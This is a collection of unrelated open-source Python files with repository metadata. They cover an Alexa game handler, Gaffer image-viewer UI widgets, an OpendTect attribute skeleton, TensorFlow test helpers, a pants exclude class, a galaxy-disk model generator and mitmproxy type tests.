if answer[number] in session.attributes['not_machted']:
session.attributes['not_machted'].remove(answer[number])
if len(session.attributes['not_machted']) == 0:
msg = render_template('end', number = number, animal = answer[number])
return statement(msg)
else:
msg = render_template('win', number = number, animal = answer[number])
else:
msg = render_template('lose', number = number, animal = answer[number])
return question(msg)
if __name__ == '__main__':
    # Start the Flask development server when run directly.
    app.run(debug=True)
|
horefice/alexa_matching_game
|
matching_game.py
|
Python
|
mit
| 1,766
|
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import math
import imath
import IECore
import Gaffer
import GafferUI
import GafferImage
import GafferImageUI
##########################################################################
# Metadata registration.
##########################################################################
Gaffer.Metadata.registerNode(
GafferImageUI.ImageView,
"nodeToolbar:bottom:type", "GafferUI.StandardNodeToolbar.bottom",
"toolbarLayout:customWidget:LeftSpacer:widgetType", "GafferImageUI.ImageViewUI._Spacer",
"toolbarLayout:customWidget:LeftSpacer:section", "Top",
"toolbarLayout:customWidget:LeftSpacer:index", 0,
"toolbarLayout:customWidget:StateWidget:widgetType", "GafferImageUI.ImageViewUI._StateWidget",
"toolbarLayout:customWidget:StateWidget:section", "Top",
"toolbarLayout:customWidget:StateWidget:index", -1,
"toolbarLayout:customWidget:RightSpacer:widgetType", "GafferImageUI.ImageViewUI._Spacer",
"toolbarLayout:customWidget:RightSpacer:section", "Top",
"toolbarLayout:customWidget:RightSpacer:index", -2,
"toolbarLayout:customWidget:BottomRightSpacer:widgetType", "GafferImageUI.ImageViewUI._Spacer",
"toolbarLayout:customWidget:BottomRightSpacer:section", "Bottom",
"toolbarLayout:customWidget:BottomRightSpacer:index", 2,
plugs = {
"clipping" : [
"description",
"""
Highlights the regions in which the colour values go above 1 or below 0.
""",
"plugValueWidget:type", "GafferImageUI.ImageViewUI._TogglePlugValueWidget",
"togglePlugValueWidget:imagePrefix", "clipping",
"togglePlugValueWidget:defaultToggleValue", True,
"toolbarLayout:divider", True,
],
"exposure" : [
"description",
"""
Applies an exposure adjustment to the image.
""",
"plugValueWidget:type", "GafferImageUI.ImageViewUI._TogglePlugValueWidget",
"togglePlugValueWidget:imagePrefix", "exposure",
"togglePlugValueWidget:defaultToggleValue", 1,
],
"gamma" : [
"description",
"""
Applies a gamma correction to the image.
""",
"plugValueWidget:type", "GafferImageUI.ImageViewUI._TogglePlugValueWidget",
"togglePlugValueWidget:imagePrefix", "gamma",
"togglePlugValueWidget:defaultToggleValue", 2,
],
"displayTransform" : [
"description",
"""
Applies colour space transformations for viewing the image correctly.
""",
"plugValueWidget:type", "GafferUI.PresetsPlugValueWidget",
"label", "",
"toolbarLayout:width", 100,
"presetNames", lambda plug : IECore.StringVectorData( GafferImageUI.ImageView.registeredDisplayTransforms() ),
"presetValues", lambda plug : IECore.StringVectorData( GafferImageUI.ImageView.registeredDisplayTransforms() ),
],
"colorInspector" : [
"plugValueWidget:type", "GafferImageUI.ImageViewUI._ColorInspectorPlugValueWidget",
"label", "",
"toolbarLayout:section", "Bottom",
"toolbarLayout:index", 1,
],
"channels" : [
"description",
"""
Chooses an RGBA layer or an auxiliary channel to display.
""",
"plugValueWidget:type", "GafferImageUI.RGBAChannelsPlugValueWidget",
"toolbarLayout:index", 1,
"toolbarLayout:width", 175,
"label", "",
],
"soloChannel" : [
"description",
"""
Chooses a channel to show in isolation.
""",
"plugValueWidget:type", "GafferImageUI.ImageViewUI._SoloChannelPlugValueWidget",
"toolbarLayout:index", 1,
"toolbarLayout:divider", True,
"label", "",
],
}
)
##########################################################################
# _TogglePlugValueWidget
##########################################################################
# Toggles between default value and the last non-default value
class _TogglePlugValueWidget( GafferUI.PlugValueWidget ) :
    """Button that toggles a plug between its default value and the last
    non-default value it was seen with (seeded from plug metadata)."""

    def __init__( self, plug, **kw ) :

        row = GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 2 )
        GafferUI.PlugValueWidget.__init__( self, row, plug, **kw )

        # Image prefix for the on/off button icons, taken from plug metadata.
        self.__imagePrefix = Gaffer.Metadata.value( plug, "togglePlugValueWidget:imagePrefix" )
        with row :

            self.__button = GafferUI.Button( "", self.__imagePrefix + "Off.png", hasFrame=False )
            self.__button.clickedSignal().connect( Gaffer.WeakMethod( self.__clicked ), scoped = False )

            if not isinstance( plug, Gaffer.BoolPlug ) :
                # Non-bool plugs additionally get a numeric entry widget.
                plugValueWidget = GafferUI.PlugValueWidget.create( plug, useTypeOnly=True )
                plugValueWidget.numericWidget().setFixedCharacterWidth( 5 )

        # Value restored when toggling back on; seeded from metadata and
        # updated whenever a non-default value is observed.
        self.__toggleValue = Gaffer.Metadata.value( plug, "togglePlugValueWidget:defaultToggleValue" )
        self._updateFromPlug()

    def hasLabel( self ) :
        # The button image stands in for a label.
        return True

    def getToolTip( self ) :

        result = GafferUI.PlugValueWidget.getToolTip( self )

        if result :
            result += "\n"
        result += "## Actions\n\n"
        result += "- Click to toggle to/from default value\n"

        return result

    def _updateFromPlug( self ) :

        with self.getContext() :
            value = self.getPlug().getValue()

        if value != self.getPlug().defaultValue() :
            # Remember the non-default value so a later click can restore it.
            self.__toggleValue = value
            self.__button.setImage( self.__imagePrefix + "On.png" )
        else :
            self.__button.setImage( self.__imagePrefix + "Off.png" )

        self.setEnabled( self.getPlug().settable() )

    def __clicked( self, button ) :

        with self.getContext() :
            value = self.getPlug().getValue()

        if value == self.getPlug().defaultValue() and self.__toggleValue is not None :
            self.getPlug().setValue( self.__toggleValue )
        else :
            self.getPlug().setToDefault()
##########################################################################
# _ColorInspectorPlugValueWidget
##########################################################################
class _ColorInspectorPlugValueWidget( GafferUI.PlugValueWidget ) :
    """Bottom-toolbar readout showing the pixel position, colour swatch and
    RGB(A)/HSV values under the mouse, sampled in a background task."""

    def __init__( self, plug, **kw ) :

        frame = GafferUI.Frame( borderWidth = 4 )
        GafferUI.PlugValueWidget.__init__( self, frame, plug, **kw )

        # Style selector specificity rules seem to preclude us styling this
        # based on gafferClass.
        frame._qtWidget().setObjectName( "gafferColorInspector" )

        with frame :

            with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 4 ) :

                GafferUI.Spacer( imath.V2i( 10 ), imath.V2i( 10 ) )

                self.__positionLabel = GafferUI.Label()
                self.__positionLabel._qtWidget().setFixedWidth( 90 )

                self.__swatch = GafferUI.ColorSwatch()
                self.__swatch._qtWidget().setFixedWidth( 12 )
                self.__swatch._qtWidget().setFixedHeight( 12 )

                self.__busyWidget = GafferUI.BusyWidget( size = 12 )

                self.__rgbLabel = GafferUI.Label()

                GafferUI.Spacer( imath.V2i( 20, 10 ), imath.V2i( 20, 10 ) )

                self.__hsvLabel = GafferUI.Label()

                GafferUI.Spacer( imath.V2i( 10 ), imath.V2i( 10 ) )

        # Last pixel the mouse was seen over; sampled lazily in the background.
        self.__pixel = imath.V2f( 0 )

        viewportGadget = plug.parent().viewportGadget()
        viewportGadget.mouseMoveSignal().connect( Gaffer.WeakMethod( self.__mouseMove ), scoped = False )

        imageGadget = viewportGadget.getPrimaryChild()
        imageGadget.buttonPressSignal().connect( Gaffer.WeakMethod( self.__buttonPress ), scoped = False )
        imageGadget.dragBeginSignal().connect( Gaffer.WeakMethod( self.__dragBegin ), scoped = False )
        imageGadget.dragEndSignal().connect( Gaffer.WeakMethod( self.__dragEnd ), scoped = False )

        self.__updateLabels( imath.V2i( 0 ), imath.Color4f( 0, 0, 0, 1 ) )

    def _updateFromPlug( self ) :

        self.__updateLazily()

    @GafferUI.LazyMethod()
    def __updateLazily( self ) :

        with self.getContext() :
            self.__updateInBackground( self.__pixel )

    @GafferUI.BackgroundMethod()
    def __updateInBackground( self, pixel ) :
        # Runs off the UI thread; samples the colour under `pixel` via the
        # colorInspector plug, using a context variable to select the pixel.

        image = self.getPlug().node().viewportGadget().getPrimaryChild().getImage()

        with Gaffer.Context( Gaffer.Context.current() ) as c :
            c["colorInspector:pixel"] = pixel
            samplerChannels = self.getPlug()["color"].getInput().node()["channels"].getValue()
            channelNames = image["channelNames"].getValue()
            color = self.getPlug()["color"].getValue()

        # Drop the alpha component when the image has no alpha channel.
        if samplerChannels[3] not in channelNames :
            color = imath.Color3f( color[0], color[1], color[2] )

        return pixel, color

    @__updateInBackground.preCall
    def __updateInBackgroundPreCall( self ) :

        self.__busyWidget.setBusy( True )

    @__updateInBackground.postCall
    def __updateInBackgroundPostCall( self, backgroundResult ) :

        if isinstance( backgroundResult, IECore.Cancelled ) :
            # Cancellation. This could be due to any of the
            # following :
            #
            # - This widget being hidden.
            # - A graph edit that will affect the image and will have
            #   triggered a call to _updateFromPlug().
            # - A graph edit that won't trigger a call to _updateFromPlug().
            #
            # LazyMethod takes care of all this for us. If we're hidden,
            # it waits till we're visible. If `updateFromPlug()` has already
            # called `__updateLazily()`, our call will just replace the
            # pending call.
            self.__updateLazily()
            return
        elif isinstance( backgroundResult, Exception ) :
            # Computation error. This will be reported elsewhere
            # in the UI.
            self.__updateLabels( self.__pixel, imath.Color4f( 0 ) )
        else :
            # Success. We have valid infomation to display.
            self.__updateLabels( backgroundResult[0], backgroundResult[1] )

        self.__busyWidget.setBusy( False )

    def __updateLabels( self, pixel, color ) :

        self.__positionLabel.setText( "<b>XY : %d %d</b>" % ( pixel.x, pixel.y ) )
        self.__swatch.setColor( color )

        if isinstance( color, imath.Color4f ) :
            self.__rgbLabel.setText( "<b>RGBA : %.3f %.3f %.3f %.3f</b>" % ( color.r, color.g, color.b, color.a ) )
        else :
            self.__rgbLabel.setText( "<b>RGB : %.3f %.3f %.3f</b>" % ( color.r, color.g, color.b ) )

        hsv = color.rgb2hsv()
        self.__hsvLabel.setText( "<b>HSV : %.3f %.3f %.3f</b>" % ( hsv.r, hsv.g, hsv.b ) )

    def __mouseMove( self, viewportGadget, event ) :
        # Track the hovered pixel and schedule a lazy resample when it changes.

        imageGadget = viewportGadget.getPrimaryChild()
        l = viewportGadget.rasterToGadgetSpace( imath.V2f( event.line.p0.x, event.line.p0.y ), imageGadget )
        try :
            pixel = imageGadget.pixelAt( l )
        except :
            # `pixelAt()` can throw if there is an error
            # computing the image being viewed. We leave
            # the error reporting to other UI components.
            return False

        pixel = imath.V2f( math.floor( pixel.x ), math.floor( pixel.y ) ) # Origin
        pixel = pixel + imath.V2f( 0.5 ) # Center

        if pixel == self.__pixel :
            return False

        self.__pixel = pixel
        self.__updateLazily()

        return True

    def __buttonPress( self, imageGadget, event ) :

        if event.buttons != event.Buttons.Left or event.modifiers :
            return False

        return True # accept press so we get dragBegin()

    def __dragBegin( self, imageGadget, event ) :
        # Dragging from the image carries the sampled colour (e.g. onto a
        # colour plug elsewhere in the UI).

        if event.buttons != event.Buttons.Left or event.modifiers :
            return False

        with Gaffer.Context( self.getContext() ) as c :
            c["colorInspector:pixel"] = self.__pixel
            try :
                color = self.getPlug()["color"].getValue()
            except :
                # Error will be reported elsewhere in the UI
                return None

        GafferUI.Pointer.setCurrent( "rgba" )
        return color

    def __dragEnd( self, imageGadget, event ) :

        GafferUI.Pointer.setCurrent( "" )
        return True
##########################################################################
# _SoloChannelPlugValueWidget
##########################################################################
class _SoloChannelPlugValueWidget( GafferUI.PlugValueWidget ) :
    """Menu button for choosing the channel displayed in isolation."""

    def __init__( self, plug, **kw ) :

        self.__button = GafferUI.MenuButton(
            image = "soloChannel-1.png",
            hasFrame = False,
            menu = GafferUI.Menu(
                Gaffer.WeakMethod( self.__menuDefinition ),
                title = "Channel",
            )
        )

        GafferUI.PlugValueWidget.__init__( self, self.__button, plug, **kw )

        self._updateFromPlug()

    def _updateFromPlug( self ) :
        """Show an icon that matches the currently soloed channel."""

        with Gaffer.Context() :
            self.__button.setImage( "soloChannel{0}.png".format( self.getPlug().getValue() ) )

    def __menuDefinition( self ) :
        """Build the channel menu, ticking the current selection."""

        with self.getContext() :
            current = self.getPlug().getValue()

        definition = IECore.MenuDefinition()
        for label, value in (
            ( "All", -1 ),
            ( "R", 0 ),
            ( "G", 1 ),
            ( "B", 2 ),
            ( "A", 3 ),
        ) :
            definition.append(
                "/" + label,
                {
                    "command" : functools.partial( Gaffer.WeakMethod( self.__setValue ), value ),
                    "checkBox" : current == value
                }
            )

        return definition

    def __setValue( self, value, *unused ) :

        self.getPlug().setValue( value )
##########################################################################
# _StateWidget
##########################################################################
class _Spacer( GafferUI.Spacer ) :
    """Fixed 25-pixel-high toolbar spacer.

    The *imageView* argument is required by the custom-widget protocol
    but is not used.
    """

    def __init__( self, imageView, **kw ) :

        GafferUI.Spacer.__init__( self, size = imath.V2i( 0, 25 ) )
## \todo This widget is basically the same as the SceneView and UVView ones. Perhaps the
# View base class should provide standard functionality for pausing and state, and we could
# use one standard widget for everything.
class _StateWidget( GafferUI.Widget ) :
    """Pause button plus busy indicator for the viewer's image processing."""

    def __init__( self, imageView, **kw ) :

        layout = GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 4 )
        GafferUI.Widget.__init__( self, layout, **kw )

        with layout :
            self.__busyWidget = GafferUI.BusyWidget( size = 20 )
            self.__button = GafferUI.Button( hasFrame = False )

        self.__imageGadget = imageView.viewportGadget().getPrimaryChild()

        self.__button.clickedSignal().connect( Gaffer.WeakMethod( self.__buttonClick ), scoped = False )
        self.__imageGadget.stateChangedSignal().connect( Gaffer.WeakMethod( self.__stateChanged ), scoped = False )

        self.__update()

    def __stateChanged( self, imageGadget ) :

        self.__update()

    def __buttonClick( self, button ) :
        # Toggle pause, then refresh the button image and tooltip.

        self.__imageGadget.setPaused( not self.__imageGadget.getPaused() )
        self.__update()

    def __update( self ) :

        isPaused = self.__imageGadget.getPaused()
        self.__button.setImage( "viewPaused.png" if isPaused else "viewPause.png" )
        self.__busyWidget.setBusy( self.__imageGadget.state() == self.__imageGadget.State.Running )
        self.__button.setToolTip( "Viewer updates suspended, click to resume" if isPaused else "Click to suspend viewer updates [esc]" )
|
lucienfostier/gaffer
|
python/GafferImageUI/ImageViewUI.py
|
Python
|
bsd-3-clause
| 15,737
|
# External Attribute Skeleton
#
# Input: Single trace, single attribute
# Output: Single attribute
#
import sys,os
import numpy as np
#
# Import the module with the I/O scaffolding of the External Attribute
#
sys.path.insert(0, os.path.join(sys.path[0], '..'))
import extattrib as xa
#
# The attribute parameters - keep what you need
#
xa.params = {
    'Inputs': ['Input'],
    # Window of samples around the evaluation point; presumably -30..+30
    # samples with a symmetric UI control -- confirm against plugin docs.
    'ZSampMargin' : {'Value': [-30,30], 'Symmetric': True},
    # Example scalar parameters exposed in the attribute UI.
    'Par_0' : {'Name': 'Parameter 0', 'Value': 0},
    'Par_1' : {'Name': 'Parameter 1', 'Value': 1},
    'Par_2' : {'Name': 'Parameter 2', 'Value': 2},
    'Par_3' : {'Name': 'Parameter 3', 'Value': 3},
    'Par_4' : {'Name': 'Parameter 4', 'Value': 4},
    'Par_5' : {'Name': 'Parameter 5', 'Value': 5},
    # Example drop-down selection; 'Selection' is the default index.
    'Select' : {'Name': 'Option', 'Values': ['First', 'Second', 'Third'], 'Selection': 0},
    # Request single-threaded execution from the host.
    'Parallel' : False,
    'Help' : 'http://waynegm.github.io/OpendTect-Plugin-Docs/Attributes/ExternalAttrib/'
}
#
# Define the compute function
#
def doCompute():
    """Trace-processing entry point called by the External Attribute plugin.

    Loops indefinitely, reading one trace segment per iteration via
    ``xa.doInput()`` and writing one output attribute via ``xa.doOutput()``;
    the host ends the loop by closing the I/O streams.
    """
    #
    # Initialise some constants from the attribute parameters or the SeismicInfo, xa.SI, array for use in the calculations
    # These are just some examples - keep/add what you need
    #
    nyquist = 1.0/(2.0*xa.SI['zstep'])
    par0 = xa.params['Par_0']['Value']
    zw = xa.params['ZSampMargin']['Value'][1] - xa.params['ZSampMargin']['Value'][0] + 1
    select = xa.params['Select']['Selection']
    #
    # This is the trace processing loop
    #
    while True:
        xa.doInput()
        #
        # After doInput the TraceInfo, xa.TI, array contains information specific to this trace segment - keep what you need
        #
        # NOTE: these locals (and the constants above) are skeleton examples
        # and remain unused until you add your own calculation below.
        number_of_samples = xa.TI['nrsamp']
        start_time = xa.TI['z0']
        current_inline = xa.TI['inl']
        current_crossline = xa.TI['crl']
        #
        # Get the input
        #
        indata = xa.Input['Input'][0,0,:]
        #
        # Your attribute calculation goes here
        #
        outdata = indata
        #------------------------------------------------------------------------------------
        #
        xa.Output = outdata
        xa.doOutput()
#
# Assign the compute function to the attribute
#
xa.doCompute = doCompute
#
# Do it
#
xa.run(sys.argv[1:])
|
waynegm/OpendTect-Plugins
|
bin/python/wmpy/Skeletons/ex_single_trace_single_attribute_input_single_output.py
|
Python
|
gpl-3.0
| 2,026
|
import sys
import tensorflow as tf
def oracle_model(x, y):
    """Oracle 'model' for tests: predicts the labels exactly, with zero loss
    and a no-op training step."""
    predictions = y
    loss = 0.0
    train_op = tf.no_op()
    return predictions, loss, train_op
def user_input_fn(filename_queue):
    """Adapt a queue into ``(features, labels)`` dicts sharing the dequeued value."""
    value = filename_queue.dequeue()
    return {"x": value}, {"y": value}
def append_argv(*args):
    """Reset ``sys.argv`` to a sentinel program name once, then append *args*."""
    sentinel = "THIS_SHOULD_NEVER_MATCH"
    if sys.argv[0] != sentinel:
        sys.argv = [sentinel]
    sys.argv.extend(args)
|
raviqqe/tensorflow-qnd
|
qnd/test.py
|
Python
|
unlicense
| 344
|
# ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
from twitter.pants.base.generator import TemplateData
class Exclude(object):
    """A dependency exclude pattern used to filter transitive dependencies.

    Two excludes are equal when both their ``org`` and ``name`` match; a
    ``name`` of None excludes the whole organisation.
    """

    def __init__(self, org, name = None):
        self.org = org
        self.name = name

    def __eq__(self, other):
        # Falsy `other` short-circuits exactly as the original and-chain did.
        if not other:
            return other
        return type(other) == Exclude and self.org == other.org and self.name == other.name

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        h = 17
        for component in (self.org, self.name):
            h *= 37 + hash(component)
        return h

    def __repr__(self):
        name_repr = ('%s' % self.name) if self.name else None
        return "Exclude(org='%s', name=%s)" % (self.org, name_repr)

    def _create_template_data(self):
        # Render-friendly view for the pants template generator.
        return TemplateData(
            org = self.org,
            name = self.name,
        )
|
foursquare/commons-old
|
src/python/twitter/pants/targets/exclude.py
|
Python
|
apache-2.0
| 1,720
|
from __future__ import division
import numpy as np
import math
from utils import *
from geom import *
from mcmc import *
def make_exp_test_disk(xmax, ymax, modelParams):
    """Build a synthetic inclined-disk velocity field from the exponential model.

    modelParams unpacks as (vmax, c, pa, incl) where incl is a sequence of
    inclinations; one model column is produced per inclination.  Returns
    (X, Y, model_vel, model_vel_err) with errors set to 10% of the model.
    """
    vmax, c, pa, incl = modelParams
    # Sample a regular (2*xmax+1) x (2*ymax+1) grid of pixel centres.
    x = []
    y = []
    for i, yi in enumerate(np.linspace(-ymax, ymax, 2*ymax+1)):
        for j, xi in enumerate(np.linspace(-xmax, xmax, 2*xmax+1)):
            #print i, j, xi, yi
            x.append(xi)
            y.append(yi)
            #print yi, xi
    x = np.reshape(x, (len(x), 1))
    y = np.reshape(y, (len(y), 1))
    #cutting out a round disk
    radius = np.where(np.sqrt(x**2 + y**2) < xmax)
    x = x[radius]
    y = y[radius]
    # One column of coordinates/velocities per inclination.
    X = np.empty((x.shape[0], len(incl)))
    Y = X.copy()
    model_vel = X.copy()
    for l in range(0, len(incl)):
        print l
        X[:, l] = x
        Y[:, l] = y
    for i, inclination in enumerate(incl):
        print np.degrees(pa), np.degrees(inclination), 'pa, incl at make disk'
        Y[:, i] = Y[:, i]*np.cos(inclination) #projection
        #rotating by PA, projecting
        X[:, i], Y[:, i] = rotateGalaxy(X[:, i], Y[:, i], pa)
        # NOTE(review): the inline comment claims this tuple is
        # (x, y, vel, vel_err, r50), but only three values are passed --
        # confirm against expModel's expected signature.
        data = (X[:, i], Y[:, i], 5) #x, y, vel, vel_err, r50 = data
        model_vel[:, i] = expModel(modelParams, data)
    #simple_plot(X, Y, model_vel, 'img/models/exp_test.png')
    return X, Y, model_vel, 0.1*model_vel
def make_test_disk(xmax, ymax, modelParams):
    """Build a synthetic inclined-disk velocity field from the Courteau model.

    modelParams unpacks as (vc, c, gamma, pa, incl); incl is a sequence of
    inclinations.  Returns (X, Y, model_vel, model_vel_err) with a constant
    error of 10 for every sample, and writes a diagnostic plot.
    """
    x = []
    y = []
    vc, c, gamma, pa, incl = modelParams
    # Sample a regular (2*xmax+1) x (2*ymax+1) grid of pixel centres.
    for i, yi in enumerate(np.linspace(-ymax, ymax, 2*ymax+1)):
        for j, xi in enumerate(np.linspace(-xmax, xmax, 2*xmax+1)):
            #print i, j, xi, yi
            x.append(xi)
            y.append(yi)
            #print yi, xi
    x = np.reshape(x, (len(x), 1))
    y = np.reshape(y, (len(y), 1))
    #cutting out a round disk
    radius = np.where(np.sqrt(x**2 + y**2) < xmax)
    x = x[radius]
    y = y[radius]
    # One column of coordinates/velocities per inclination.
    X = np.empty((x.shape[0], len(incl)))
    Y = X.copy()
    model_vel = X.copy()
    for l in range(0, len(incl)):
        print l
        X[:, l] = x
        Y[:, l] = y
    for i, inclination in enumerate(incl):
        Y[:, i] = Y[:, i]*np.cos(inclination) #projection
        #rotating by PA, projecting
        X[:, i], Y[:, i] = rotateGalaxy(X[:, i], Y[:, i], pa)
        data = (X[:, i], Y[:, i], np.zeros((X.shape)), np.zeros((Y.shape)), 5) #5 -- dummy R_e parameter
        params = (vc, c, gamma, pa, inclination)
        model_vel[:, i] = model2_Courteau(params, data)
        model_vel[:, i] = model_vel[:, i]  # NOTE(review): self-assignment; has no effect
    simple_plot(X, Y, model_vel, 'img/models/test.png')
    return X, Y, model_vel, 10*np.ones((model_vel.shape))
|
astrolitterbox/SAMI
|
test_disk.py
|
Python
|
gpl-2.0
| 2,454
|
import pytest
import os
import typing
import contextlib
import mitmproxy.exceptions
import mitmproxy.types
from mitmproxy.test import taddons
from mitmproxy.test import tflow
from mitmproxy import command
from mitmproxy import flow
from . import test_command
@contextlib.contextmanager
def chdir(path: str):
    """Temporarily change the working directory.

    BUG FIX: the previous version did not restore the old directory when the
    managed block raised, leaking the directory change into later tests.
    The restore now runs in a ``finally`` clause.
    """
    old_dir = os.getcwd()
    os.chdir(path)
    try:
        yield
    finally:
        os.chdir(old_dir)
def test_bool():
    """_BoolType: completion, parsing and validation of booleans."""
    with taddons.context() as tctx:
        typ = mitmproxy.types._BoolType()
        cmds = tctx.master.commands
        assert typ.completion(cmds, bool, "b") == ["false", "true"]
        assert typ.parse(cmds, bool, "true") is True
        assert typ.parse(cmds, bool, "false") is False
        assert typ.is_valid(cmds, bool, True) is True
        assert typ.is_valid(cmds, bool, "foo") is False
        with pytest.raises(mitmproxy.exceptions.TypeError):
            typ.parse(cmds, bool, "foo")
def test_str():
    """_StrType round-trips strings and rejects non-string values."""
    with taddons.context() as tctx:
        typ = mitmproxy.types._StrType()
        cmds = tctx.master.commands
        assert typ.is_valid(cmds, str, "foo") is True
        assert typ.is_valid(cmds, str, 1) is False
        assert typ.completion(cmds, str, "") == []
        assert typ.parse(cmds, str, "foo") == "foo"
def test_unknown():
    """_UnknownType never validates but still parses/completes passively."""
    with taddons.context() as tctx:
        typ = mitmproxy.types._UnknownType()
        cmds = tctx.master.commands
        assert typ.is_valid(cmds, mitmproxy.types.Unknown, "foo") is False
        assert typ.is_valid(cmds, mitmproxy.types.Unknown, 1) is False
        assert typ.completion(cmds, mitmproxy.types.Unknown, "") == []
        assert typ.parse(cmds, mitmproxy.types.Unknown, "foo") == "foo"
def test_int():
    """_IntType: parsing decimal strings and rejecting non-integers."""
    with taddons.context() as tctx:
        typ = mitmproxy.types._IntType()
        cmds = tctx.master.commands
        assert typ.is_valid(cmds, int, "foo") is False
        assert typ.is_valid(cmds, int, 1) is True
        assert typ.completion(cmds, int, "b") == []
        assert typ.parse(cmds, int, "1") == 1
        assert typ.parse(cmds, int, "999") == 999
        with pytest.raises(mitmproxy.exceptions.TypeError):
            typ.parse(cmds, int, "foo")
def test_path(tdata, monkeypatch):
    """_PathType: parsing (incl. ~ expansion), validation and completion."""
    with taddons.context() as tctx:
        typ = mitmproxy.types._PathType()
        cmds = tctx.master.commands
        assert typ.parse(cmds, mitmproxy.types.Path, "/foo") == "/foo"
        assert typ.parse(cmds, mitmproxy.types.Path, "/bar") == "/bar"
        monkeypatch.setenv("HOME", "/home/test")
        monkeypatch.setenv("USERPROFILE", "/home/test")
        assert typ.parse(cmds, mitmproxy.types.Path, "~/mitm") == "/home/test/mitm"
        assert typ.is_valid(cmds, mitmproxy.types.Path, "foo") is True
        assert typ.is_valid(cmds, mitmproxy.types.Path, "~/mitm") is True
        assert typ.is_valid(cmds, mitmproxy.types.Path, 3) is False

        def opts_relative_to(prefix, match):
            # Strip the prefix and normalise separators for portable asserts.
            completions = []
            for entry in typ.completion(cmds, mitmproxy.types.Path, match):
                completions.append(entry[len(prefix):].replace(os.sep, "/"))
            return completions

        cd = os.path.normpath(tdata.path("mitmproxy/completion"))
        assert opts_relative_to(cd, cd) == ['/aaa', '/aab', '/aac', '/bbb/']
        assert opts_relative_to(cd, os.path.join(cd, "a")) == ['/aaa', '/aab', '/aac']
        with chdir(cd):
            assert opts_relative_to("", "./") == ['./aaa', './aab', './aac', './bbb/']
            assert opts_relative_to("", "") == ['./aaa', './aab', './aac', './bbb/']
        assert typ.completion(
            cmds, mitmproxy.types.Path, "nonexistent"
        ) == ["nonexistent"]
def test_cmd():
    """_CmdType resolves registered command names and completes over all of them."""
    with taddons.context() as tctx:
        tctx.master.addons.add(test_command.TAddon())
        typ = mitmproxy.types._CmdType()
        cmds = tctx.master.commands
        assert typ.is_valid(cmds, mitmproxy.types.Cmd, "foo") is False
        assert typ.is_valid(cmds, mitmproxy.types.Cmd, "cmd1") is True
        assert typ.parse(cmds, mitmproxy.types.Cmd, "cmd1") == "cmd1"
        with pytest.raises(mitmproxy.exceptions.TypeError):
            assert typ.parse(cmds, mitmproxy.types.Cmd, "foo")
        completions = typ.completion(cmds, mitmproxy.types.Cmd, "")
        assert len(completions) == len(cmds.commands.keys())
def test_cutspec():
    """_CutSpecType: comma-separated cut specs parse, validate, and complete."""
    with taddons.context() as tctx:
        b = mitmproxy.types._CutSpecType()
        # BUG FIX: this comparison was previously a bare expression statement
        # (missing `assert`), so the parse result was never actually checked.
        assert b.parse(tctx.master.commands, mitmproxy.types.CutSpec, "foo,bar") == ["foo", "bar"]
        assert b.is_valid(tctx.master.commands, mitmproxy.types.CutSpec, 1) is False
        assert b.is_valid(tctx.master.commands, mitmproxy.types.CutSpec, "foo") is False
        assert b.is_valid(tctx.master.commands, mitmproxy.types.CutSpec, "request.path") is True
        # Completion of a partial spec offers all valid prefixes.
        assert b.completion(
            tctx.master.commands, mitmproxy.types.CutSpec, "request.p"
        ) == b.valid_prefixes
        # Completing after a comma keeps the already-typed head.
        ret = b.completion(tctx.master.commands, mitmproxy.types.CutSpec, "request.port,f")
        assert ret[0].startswith("request.port,")
        assert len(ret) == len(b.valid_prefixes)
def test_arg():
    """_ArgType: opaque command arguments pass through untouched."""
    with taddons.context() as tctx:
        arg_type = mitmproxy.types._ArgType()
        commands = tctx.master.commands
        assert arg_type.completion(commands, mitmproxy.types.CmdArgs, "") == []
        assert arg_type.parse(commands, mitmproxy.types.CmdArgs, "foo") == "foo"
        assert arg_type.is_valid(commands, mitmproxy.types.CmdArgs, 1) is False
def test_strseq():
    """_StrSeqType: comma-separated strings become string sequences."""
    with taddons.context() as tctx:
        seq_type = mitmproxy.types._StrSeqType()
        commands = tctx.master.commands
        assert seq_type.completion(commands, typing.Sequence[str], "") == []
        assert seq_type.parse(commands, typing.Sequence[str], "foo") == ["foo"]
